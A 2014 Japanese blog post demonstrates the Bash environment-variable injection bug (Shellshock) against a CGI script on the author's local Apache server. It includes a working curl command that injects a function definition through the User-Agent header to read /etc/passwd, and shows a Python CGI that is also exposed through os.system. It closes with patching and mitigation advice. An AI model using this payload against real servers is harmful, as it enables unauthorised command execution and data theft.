BASHの脆弱性でCGIスクリプトにアレさせてみました

Linux 2014年9月25日

環境変数に仕込まれたコードを実行してしまうBASHの脆弱性が CGIスクリプトに影響を与えるか試してみたら結果は悲惨な感じに

朝から Bash specially-crafted environment variables code injection attack なるもので騒ぎになっていたので、さっそく手元の Apacheで試してみました。

CGIスクリプト

/hoge.cgiというURIで実行されるように、一行のメッセージを出力するだけの CGIスクリプトを設置します。いっけん、なんの入力もクライアント側から受け付けていないため危険のありようもなく見えます。

#!/bin/sh
echo "Content-type: text/plain"
echo
echo "Hi! I'm an ordinary CGI script which is executed by /bin/sh"

多くの Linuxシステムでは /bin/shは /bin/bash を指していますので、このCGIは BASHで実行されることになります。

通常の実行結果

CGIスクリプトが echoした内容が表示されるだけです。

悪い奴の行動

それでは攻撃者に扮して curlで任意のコードを実行させてみます。HTTP_USER_AGENTあたりが手頃な環境変数なので curlの -A オプションを使って自白剤を注入してみました。

$ curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://localhost/hoge.cgi

悪い奴の実行結果

ひでぶ

結論

シェルスクリプトで書かれたCGIを外向きのサーバーに置いている人は、今すぐ bashにパッチを適用するか、bash以外のシェルでCGIスクリプトが実行されるようになんとかするか、とりあえずそれらの対応ができるようになるまで chmod -xして無効にするかしないと死にます。これのゼロデイがもう既に行われまくってたりしないといいのですが。

追記: 残念なお知らせです

CGI本体をシェルスクリプトで書いていなくても、シェルを使って外部コマンドを呼び出しているだけでこの脆弱性の影響を受けるケースを確認しました。影響を受けるCGIを漏れ無く探し出すのは相当困難になると思います。

下記は、df -hコマンドの出力を表示する Python製の CGIスクリプトです。脆弱性の影響を受けます。

#!/usr/bin/python
import os,sys
print "Content-type: text/plain"
print
print "Hey, I'm a Python script so wouldn't be affected, right?"
sys.stdout.flush()
os.system("df -h")  # OMG

検証環境はスクリーンショットの内容からお察しでおねがいします。一般的とは言いがたいですが、他の Linuxで大きく違うとはあまり思いません。

中の人の感想

同じカテゴリの記事

glibcのgethostbyname関数に存在するCVE-2015-0235(GHOST)脆弱性について 2015年1月28日
DFSがどうこうと言われて Sambaの共有にアクセスできなくなった時の対処 2015年1月21日
Linuxをクラッシュさせられるバグが権限昇格のバグに進化した件 2014年12月18日
Linux 3.18リリース 2014年12月8日

お勧めカテゴリ

英語でアニメ観ようず
なじみ深い日本製アニメの英語版DVDで、字幕と音声から英語を学びましょうという趣旨のシリーズ記事です。
ScalaのようでJavaだけど少しScalaなJSON API
Scalaと Spring Frameworkを使って REST的なJSON APIを実装してみましょう。
ドクジリアン柔術少女 すから☆ぱいそん
代表 嶋田大貴のブログです。写真は神仏に見せ金をはたらく罰当たりの図